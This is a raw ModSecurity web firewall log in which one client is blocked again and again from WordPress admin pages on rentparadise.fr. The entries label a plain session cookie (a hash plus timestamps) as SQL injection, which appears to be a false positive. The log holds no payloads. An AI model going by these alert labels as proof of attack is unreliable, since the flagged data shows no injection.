[Mon May 11 22:26:00.431108 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7WHo_DFxNSZVmaX3PyAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:00.943136 2026] [security2:error] [pid 1588898:tid 1588910] [client 43.156.109.53:40566] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/feed/"] [unique_id "agI7WKFW67LJTsgN3jQL5gAAAAs"]
[Mon May 11 22:26:01.008325 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7WHo_DFxNSZVmaX3PyAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:01.240166 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7WXo_DFxNSZVmaX3PygAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:01.240466 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7WXo_DFxNSZVmaX3PygAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:01.852003 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7WXo_DFxNSZVmaX3PygAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:02.051743 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Wno_DFxNSZVmaX3PywAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:02.052042 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7Wno_DFxNSZVmaX3PywAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:02.424181 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Wno_DFxNSZVmaX3PywAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:03.333461 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7W3o_DFxNSZVmaX3PzgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:03.333741 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7W3o_DFxNSZVmaX3PzgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:03.944376 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7W3o_DFxNSZVmaX3PzgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:05.160731 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7XXo_DFxNSZVmaX3P0AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:05.161013 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7XXo_DFxNSZVmaX3P0AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:05.749333 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7XXo_DFxNSZVmaX3P0AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:06.355205 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Xno_DFxNSZVmaX3P0gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:06.355487 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Xno_DFxNSZVmaX3P0gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:06.965718 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Xno_DFxNSZVmaX3P0gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:07.542909 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7X3o_DFxNSZVmaX3P1AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:07.543390 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7X3o_DFxNSZVmaX3P1AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:08.084838 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7X3o_DFxNSZVmaX3P1AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:08.328257 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7YHo_DFxNSZVmaX3P1QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:08.328560 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7YHo_DFxNSZVmaX3P1QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:08.869359 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7YHo_DFxNSZVmaX3P1QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:09.143686 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7YXo_DFxNSZVmaX3P1wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:09.143966 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7YXo_DFxNSZVmaX3P1wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:09.500089 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7YXo_DFxNSZVmaX3P1wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:10.740132 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7Yno_DFxNSZVmaX3P2QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:10.740442 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7Yno_DFxNSZVmaX3P2QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:11.346480 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Yno_DFxNSZVmaX3P2QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:11.946087 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Y3o_DFxNSZVmaX3P2gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:11.946399 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Y3o_DFxNSZVmaX3P2gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:12.607497 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Y3o_DFxNSZVmaX3P2gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:13.246643 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7ZXo_DFxNSZVmaX3P3QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:13.247067 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7ZXo_DFxNSZVmaX3P3QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:13.887760 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7ZXo_DFxNSZVmaX3P3QAAANA"], referer: https://rentparadise.fr/wp-login.php
